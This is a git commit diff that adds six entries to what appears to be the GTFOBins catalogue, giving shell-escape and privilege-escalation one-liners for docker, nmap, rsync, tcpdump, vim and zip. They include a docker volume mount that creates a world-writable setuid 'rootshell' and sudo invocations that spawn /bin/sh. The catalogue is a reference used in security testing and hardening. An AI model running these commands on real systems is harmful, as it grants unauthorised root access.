add new ways

This commit is contained in:
AlessandroZ 2018-08-17 17:16:09 +02:00
parent 6b73dcf283
commit 7219385a05
6 changed files with 64 additions and 0 deletions

7
_gtfobins/docker.md Normal file
View File

@ -0,0 +1,7 @@
---
functions:
execute-interactive:
- code: docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
sudo-enabled:
- code: sudo docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
---

9
_gtfobins/nmap.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
execute-non-interactive:
- code: echo "os.execute('/bin/sh')" > /tmp/script.nse
nmap --script=/tmp/script.nse
sudo-enabled:
- code: echo "os.execute('/bin/sh')" > /tmp/script.nse
sudo nmap --script=/tmp/script.nse
---

9
_gtfobins/rsync.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
execute-non-interactive:
- code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
sudo-enabled:
- code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
sudo rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
---

9
_gtfobins/tcpdump.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
execute-non-interactive:
- code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
sudo-enabled:
- code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
---

19
_gtfobins/vim.md Normal file
View File

@ -0,0 +1,19 @@
---
functions:
execute-interactive:
- code: vim -c ':!/bin/sh'
- code: |
vim
:set shell=/bin/sh
:shell
file-write:
- code: |
vim file_to_write
w
file-read:
- code: vim file_to_read
suid-enabled:
- code: ./vim -c ':!/bin/sh -p'
sudo-enabled:
- code: sudo vim -c ':!/bin/sh'
---

11
_gtfobins/zip.md Normal file
View File

@ -0,0 +1,11 @@
---
functions:
execute-interactive:
- code: echo "/bin/sh" > /tmp/run.sh
chmod +x /tmp/run.sh
zip z.zip * -T -TT /tmp/run.sh
sudo-enabled:
- code: echo "/bin/sh" > /tmp/run.sh
chmod +x /tmp/run.sh
sudo zip z.zip * -T -TT /tmp/run.sh
---